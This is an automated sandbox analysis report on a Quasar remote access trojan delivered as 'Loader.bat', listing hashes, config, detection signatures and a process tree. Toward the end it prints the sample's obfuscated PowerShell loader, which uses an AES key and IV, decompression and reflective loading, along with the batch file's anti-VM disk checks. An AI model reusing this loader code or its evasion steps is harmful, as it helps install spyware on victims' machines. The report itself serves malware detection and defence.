Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-01-2025 14:39
Static task
static1
Behavioral task
behavioral1
Sample
Loader.bat
Resource
win11-20241007-en
General
-
Target
Loader.bat
-
Size
7.3MB
-
MD5
1bec1098946595a03fa067a3ef7ce292
-
SHA1
89cfb4a2f8800f1b944d906d959639907672317d
-
SHA256
a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
-
SHA512
dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
SSDEEP
49152:262lW3ZtqF71E0f+DP24xmB1F+RfHhZzvTUPbFJMg0FQ5/Ai4cr5YSW7iFsihJv1:k
Malware Config
Extracted
quasar
-
encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/1664-2111-0x00000250D2CE0000-0x00000250D3464000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2836 created 1708 2836 WerFault.exe 83 PID 4644 created 1664 4644 WerFault.exe 98 -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1708 created 632 1708 powershell.exe 5 PID 3352 created 1708 3352 svchost.exe 83 PID 1664 created 632 1664 powershell.exe 5 PID 3352 created 1664 3352 svchost.exe 98 PID 3352 created 1664 3352 svchost.exe 98 -
Blocklisted process makes network request 25 IoCs
flow pid Process 2 1664 powershell.exe 4 1664 powershell.exe 5 1664 powershell.exe 6 1664 powershell.exe 7 1664 powershell.exe 8 1664 powershell.exe 9 1664 powershell.exe 10 1664 powershell.exe 11 1664 powershell.exe 12 1664 powershell.exe 13 1664 powershell.exe 15 1664 powershell.exe 16 1664 powershell.exe 17 1664 powershell.exe 18 1664 powershell.exe 19 1664 powershell.exe 20 1664 powershell.exe 21 1664 powershell.exe 22 1664 powershell.exe 23 1664 powershell.exe 24 1664 powershell.exe 25 1664 powershell.exe 26 1664 powershell.exe 27 1664 powershell.exe 28 1664 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1708 powershell.exe 1664 powershell.exe -
Deletes itself 1 IoCs
pid Process 1708 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2752 tSVFjN.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$nya-abOpwypC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
pid Process 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1708 set thread context of 3912 1708 powershell.exe 84 PID 1664 set thread context of 3328 1664 powershell.exe 99 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN powershell.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\$rbx-onimai2 powershell.exe File created C:\Windows\$rbx-onimai2\$rbx-CO2.bat cmd.exe File opened for modification C:\Windows\$nya-onimai2 powershell.exe File created C:\Windows\$nya-onimai2\tSVFjN.exe powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 14 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 04 Jan 2025 14:41:44 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736001703" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5A091BB4-FAA7-4CAE-B669-38E63115A55C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1708 powershell.exe 1708 powershell.exe 1708 powershell.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe 3912 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3284 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 3912 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe Token: SeSecurityPrivilege 2740 svchost.exe Token: SeTakeOwnershipPrivilege 2740 svchost.exe Token: SeLoadDriverPrivilege 2740 svchost.exe Token: SeSystemtimePrivilege 2740 svchost.exe Token: SeBackupPrivilege 2740 svchost.exe Token: SeRestorePrivilege 2740 svchost.exe Token: SeShutdownPrivilege 2740 svchost.exe Token: SeSystemEnvironmentPrivilege 2740 svchost.exe Token: SeUndockPrivilege 2740 svchost.exe Token: SeManageVolumePrivilege 2740 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2740 svchost.exe Token: SeIncreaseQuotaPrivilege 2740 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1664 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3872 wrote to memory of 3880 3872 cmd.exe 78 PID 3872 wrote to memory of 3880 3872 cmd.exe 78 PID 3872 wrote to memory of 2832 3872 cmd.exe 79 PID 3872 wrote to memory of 2832 3872 cmd.exe 79 PID 3872 wrote to memory of 4600 3872 cmd.exe 80 PID 3872 wrote to memory of 4600 3872 cmd.exe 80 PID 3872 wrote to memory of 1512 3872 cmd.exe 81 PID 3872 wrote to memory of 1512 3872 cmd.exe 81 PID 3872 wrote to memory of 1652 3872 cmd.exe 82 PID 3872 wrote to memory of 1652 3872 cmd.exe 82 PID 3872 wrote to memory of 1708 3872 cmd.exe 83 PID 3872 wrote to memory of 1708 3872 cmd.exe 83 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 1708 wrote to memory of 3912 1708 powershell.exe 84 PID 3912 wrote to memory of 632 3912 dllhost.exe 5 PID 3912 wrote to memory of 684 3912 dllhost.exe 7 PID 3912 wrote to memory of 988 3912 dllhost.exe 12 PID 3912 wrote to memory of 424 3912 dllhost.exe 13 PID 3912 wrote to memory of 460 3912 dllhost.exe 14 PID 3912 wrote to memory of 628 3912 dllhost.exe 15 PID 3912 wrote to memory of 1036 3912 dllhost.exe 16 PID 3912 wrote to memory of 1044 3912 dllhost.exe 17 PID 3912 wrote to memory of 1168 3912 dllhost.exe 19 PID 3912 wrote to memory of 1200 3912 dllhost.exe 20 PID 3912 wrote to memory of 1244 3912 dllhost.exe 21 PID 3912 wrote to memory of 1324 3912 dllhost.exe 22 PID 3912 wrote to memory of 1336 3912 dllhost.exe 23 PID 3912 wrote to memory of 1344 3912 dllhost.exe 24 PID 3912 wrote to memory of 1400 3912 dllhost.exe 25 PID 3912 wrote to memory of 1456 3912 dllhost.exe 26 PID 3912 wrote to memory of 1472 3912 dllhost.exe 27 PID 3912 wrote to memory of 1604 3912 dllhost.exe 28 PID 3912 wrote to memory of 1656 3912 dllhost.exe 29 PID 3912 wrote to memory of 1724 3912 dllhost.exe 30 PID 3912 wrote to memory of 1796 3912 dllhost.exe 31 PID 3912 wrote to memory of 1852 3912 dllhost.exe 32 PID 3912 wrote to memory of 1872 3912 dllhost.exe 33 PID 3912 wrote to memory of 1880 3912 dllhost.exe 34 PID 3912 wrote to memory of 1984 3912 dllhost.exe 35 PID 3912 wrote to memory of 2044 3912 dllhost.exe 36 PID 3912 wrote to memory of 2076 3912 dllhost.exe 37 PID 3912 wrote to memory of 2264 3912 dllhost.exe 39 PID 3912 wrote to memory of 2316 3912 dllhost.exe 40 PID 3912 wrote to memory of 2544 3912 dllhost.exe 41 PID 3912 wrote to memory of 2552 3912 dllhost.exe 42 PID 3912 wrote to memory of 2596 3912 dllhost.exe 43 PID 3912 wrote to memory of 2632 3912 dllhost.exe 44 PID 3912 wrote to memory of 2664 3912 dllhost.exe 45 PID 3912 wrote to memory of 2684 3912 dllhost.exe 46 PID 3912 wrote to memory of 2728 3912 dllhost.exe 47 PID 3912 wrote to memory of 2740 3912 dllhost.exe 48 PID 3912 wrote to memory of 2764 3912 dllhost.exe 49 PID 3912 wrote to memory of 2792 3912 dllhost.exe 50 PID 3912 wrote to memory of 3120 3912 dllhost.exe 51 PID 3912 wrote to memory of 3284 3912 dllhost.exe 52 PID 3912 wrote to memory of 3440 3912 dllhost.exe 53 PID 3912 wrote to memory of 3460 3912 dllhost.exe 54 PID 3912 wrote to memory of 3892 3912 dllhost.exe 57 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:424
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c62ffddf-d182-44a2-b6b0-f7328618f04e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{0558ea34-235b-4e2a-9171-3fe29cd30ffd}2⤵PID:3328
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1244
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1336
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1400
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2632
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1852
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2664
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2792
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3120
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4308
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:3880
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"3⤵PID:2832
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives3⤵PID:4600
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"3⤵PID:1512
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, yj[yjIOyj.yjCyjoyjmyjpyjreyjsyjsyjiyjoyjn.yjCoyjmpyjreyjsyjsyjiyjonyjMyjoyjdyjeyj]yj:yj:Dyjeyjcyjoyjmyjpryjeyjsyjs);'.Replace('yj', ''); $ZloT.CopyTo($DOPc); $ZloT.Dispose(); $amXY.Dispose(); $DOPc.Dispose(); $DOPc.ToArray();}function Kxmi($VcbY,$Hqen){ Invoke-Expression -Verbose -WarningAction Inquire -Debug '$fabe=DH[DHSyDHsDHtDHeDHmDH.DHReDHfDHlDHeDHcDHtiDHonDH.ADHssDHeDHmDHbDHlyDH]DH:DH:DHLDHoDHaDHd([byte[]]$VcbY);'.Replace('DH', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore -Debug '$gCDr=$fabe.lNElNntlNrlNylNPlNolNilNntlN;'.Replace('lN', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$gCDroQ.oQInoQvoQooQkoQeoQ(oQ$noQuoQloQloQ, $Hqen);'.Replace('oQ', '');}$iHJt = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = 